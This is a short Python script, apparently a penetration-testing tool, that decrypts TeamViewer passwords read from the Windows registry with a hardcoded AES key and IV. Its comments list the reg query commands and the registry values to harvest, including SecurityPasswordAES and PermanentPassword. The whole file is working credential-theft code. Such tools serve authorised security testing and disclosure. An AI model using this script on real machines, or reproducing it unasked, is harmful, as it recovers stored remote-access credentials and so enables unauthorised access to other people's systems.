#!/usr/bin/python3

# decrypt teamviewer passwords stored in windows registry
# tvdecrypt.py <teamviewer key>

# reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version<#>
# reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7 /v <key>
# keys: SecurityPasswordExported, SecurityPasswordAES, ServerPasswordAES, ProxyPasswordAES, LicenseKeyAES, OptionsPasswordAES, OptionsPassword, PermanentPassword

import sys
from Crypto.Cipher import AES

if len(sys.argv) != 2:
        print('tvdecrypt <teamviewer key>')
        sys.exit()

rk = bytes.fromhex(sys.argv[1])
key = bytes.fromhex('0602000000a400005253413100040000')
iv = bytes.fromhex('0100010067244F436E6762F25EA8D704')

aes = AES.new(key, AES.MODE_CBC, iv)
pw = aes.decrypt(rk)

print('password found: ' + pw.decode('utf-8'))
